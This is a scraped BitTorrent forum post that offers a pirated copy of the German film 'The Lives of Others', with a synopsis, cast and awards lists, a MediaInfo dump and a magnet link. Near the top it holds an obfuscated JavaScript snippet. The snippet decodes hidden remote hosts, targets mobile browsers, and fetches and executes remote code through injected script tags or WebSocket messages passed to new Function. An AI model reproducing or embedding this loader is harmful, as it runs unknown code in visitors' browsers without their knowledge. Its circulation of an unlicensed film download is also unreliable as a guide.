窃听风暴[简繁字幕].The.Lives.of.Others.2006.1080p.FriDay.WEB-DL.H264.AAC 3.61GB

版主小s 1月前 130

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 窃听风暴 / 窃听者(港) / 他人的生活 / 别人的生活 / 别样人生 / The Lives of Others
◎片  名 Das Leben der Anderen
◎年  代 2006
◎产  地 德国
◎类  别 剧情 / 悬疑
◎语  言 德语
◎上映日期 2006-03-23(德国)
◎IMDb链接 https://www.imdb.com/title/tt0405094/
◎豆瓣评分 9.2/10 (471315人评价)
◎豆瓣链接 https://movie.douban.com/subject/1900841/
◎片  长 137分钟
◎导  演 弗洛里安·亨克尔·冯·多纳斯马尔克 Florian Henckel von Donnersmarck (id:1044973)
◎编  剧 弗洛里安·亨克尔·冯·多纳斯马尔克 Florian Henckel von Donnersmarck (id:1044973)
◎演  员 乌尔里希·穆埃 Ulrich Mühe (id:1053553)
       马蒂娜·格德克 Martina Gedeck (id:1049928)
       塞巴斯蒂安·科赫 Sebastian Koch (id:1019130)
       乌尔里希·图库尔 Ulrich Tukur (id:1025357)
       托马斯·蒂梅 Thomas Thieme (id:1154507)
       汉斯-尤韦·鲍尔 Hans-Uwe Bauer (id:1065775)
       沃克马·克莱纳特 Volkmar Kleinert (id:1109298)
       马提亚斯·布伦纳 Matthias Brenner (id:1068895)
       查理·哈纳 Charly Hübner (id:1201328)
       赫伯特·克瑙普 Herbert Knaup (id:1002926)
       巴斯蒂安·特罗斯特 Bastian Trost (id:1001734)
       玛丽·格鲁伯 Marie Gruber (id:1100594)
       维尔纳·德恩 Werner Daehn (id:1329750)
       马丁·布拉姆马赫 Martin Brambach (id:1398211)
       托马斯·阿诺德 Thomas Arnold (id:1058840)
       辛纳克·勋纳曼 Hinnerk Sch?nemann (id:1303286)
       路德韦格·布洛克伯格 Ludwig Blochberger (id:1037483)
       迈克尔·格伯 Michael Gerber (id:1102174)
       吉塔·施维赫夫 Gitta Schweigh?fer (id:1333868)
       希尔德加德·斯罗德 Hildegard Schroedter (id:1232010)
       伊嘉·比肯费尔德 Inga Birkenfeld (id:1228640)
       凯·伊沃·保利兹 Kai Ivo Baulitz (id:1063816)
       克劳斯·芒斯特 Klaus Münster (id:1133582)
       弗洛里安·亨克尔·冯·多纳斯马尔克 Florian Henckel von Donnersmarck (id:1044973)
       奎林·柏格 Quirin Berg (id:1278417)
       马克斯·威德曼 Max Wiedemann (id:1300869)
       盖布瑞·雅德 Gabriel Yared (id:1028122)
       斯特凡纳·穆恰 Stéphane Moucha (id:1303414)
       帕特里夏·隆美尔 Patricia Rommel (id:1295982)
       塞尔克·布赫 Silke Buhr (id:1279600)
       嘉儿勒·宾德 Gabriele Binder (id:1278645)
       萨宾尼·斯彻曼 Sabine Schumann (id:1296993)

◎标  签 人性 / 德国 / 剧情 / 德国电影 / 东德 / 窃听 / 社会主义 / 政治

◎简  介
  1984年的东德,整个社会笼罩在国家安全局的高压统治之下,特工魏斯曼(乌尔利希·穆厄 饰)奉命监听剧作家德莱曼(塞巴斯蒂安·寇治 饰)及其女友演员克里斯蒂娜(玛蒂娜·杰蒂克 饰)的生活,监听过程中,魏斯曼渐渐对这家人的生活产生了兴趣,开始暗中帮助他们。一篇刊登在西德《明 镜》报上的文章引起了特工头目的注意,他们认为这篇文章是德莱曼写的,并逮捕了克里斯蒂娜,希望能够从她口中得出她丈夫的秘密?而审问克里斯蒂娜的正是魏斯曼……

◎获奖情况 (共8项)
  第79届奥斯卡金像奖 (2007)
  最佳外语片
   └──弗洛里安·亨克尔·冯·多纳斯马尔克 (id:1044973)

  第64届金球奖 (2007)
  电影类 最佳外语片(提名)

  第61届英国电影学院奖 (2008)
  电影奖 最佳影片(提名)
  电影奖 最佳导演(提名)
   └──弗洛里安·亨克尔·冯·多纳斯马尔克 (id:1044973)
  电影奖 最佳男主角(提名)
   └──乌尔里希·穆埃 (id:1053553)
  电影奖 最佳原创剧本(提名)
   └──弗洛里安·亨克尔·冯·多纳斯马尔克 (id:1044973)
  电影奖 最佳非英语片

  第59届洛迦诺国际电影节 (2006)
  观众选择奖
   └──弗洛里安·亨克尔·冯·多纳斯马尔克 (id:1044973)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 120354286581141698379224211774812612439 (0x5A8B64775AA36DD2793D01095E766757)

  4. Complete name                            : [email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 3.61 GiB

  8. Duration                                 : 2 h 17 min

  9. Overall bit rate                         : 3 758 kb/s

  10. Encoded date                             : UTC 2021-08-14 04:10:23

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 1 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 1 frame

  21. Format settings, GOP                     : M=1, N=60

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 2 h 17 min

  24. Bit rate mode                            : Constant

  25. Bit rate                                 : 3 630 kb/s

  26. Nominal bit rate                         : 4 000 kb/s

  27. Width                                    : 1 920 pixels

  28. Height                                   : 1 080 pixels

  29. Display aspect ratio                     : 16:9

  30. Frame rate mode                          : Constant

  31. Frame rate                               : 29.970 (30000/1001/53354) FPS

  32. Color space                              : YUV

  33. Chroma subsampling                       : 4:2:0

  34. Bit depth                                : 8 bits

  35. Scan type                                : Progressive

  36. Bits/(Pixel*Frame)                       : 0.058

  37. Stream size                              : 3.49 GiB (97%)

  38. Language                                 : English

  39. Default                                  : Yes

  40. Forced                                   : No


  41. Audio

  42. ID                                       : 2

  43. Format                                   : AAC LC

  44. Format/Info                              : Advanced Audio Codec Low Complexity

  45. Codec ID                                 : A_AAC-2

  46. Duration                                 : 2 h 17 min

  47. Bit rate                                 : 125 kb/s

  48. Channel(s)                               : 2 channels

  49. Channel layout                           : L R

  50. Sampling rate                            : 48.0 kHz

  51. Frame rate                               : 46.875 FPS (1024 SPF)

  52. Compression mode                         : Lossy

  53. Stream size                              : 123 MiB (3%)

  54. Language                                 : German

  55. Default                                  : Yes

  56. Forced                                   : No


  57. Text #1

  58. ID                                       : 3

  59. Format                                   : UTF-8

  60. Codec ID                                 : S_TEXT/UTF8

  61. Codec ID/Info                            : UTF-8 Plain Text

  62. Duration                                 : 2 h 11 min

  63. Bit rate                                 : 38 b/s

  64. Count of elements                        : 1417

  65. Stream size                              : 36.8 KiB (0%)

  66. Title                                    : Chinese Simplified

  67. Language                                 : Chinese

  68. Default                                  : Yes

  69. Forced                                   : No


  70. Text #2

  71. ID                                       : 4

  72. Format                                   : UTF-8

  73. Codec ID                                 : S_TEXT/UTF8

  74. Codec ID/Info                            : UTF-8 Plain Text

  75. Duration                                 : 2 h 11 min

  76. Bit rate                                 : 38 b/s

  77. Count of elements                        : 1417

  78. Stream size                              : 36.8 KiB (0%)

  79. Title                                    : Chinese Traditional

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No



TAGS 剧情 悬疑

磁力链:
  • magnet:?xt=urn:btih:A71570E538947C5C31909581E0AAD3A9BDC3D59A

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回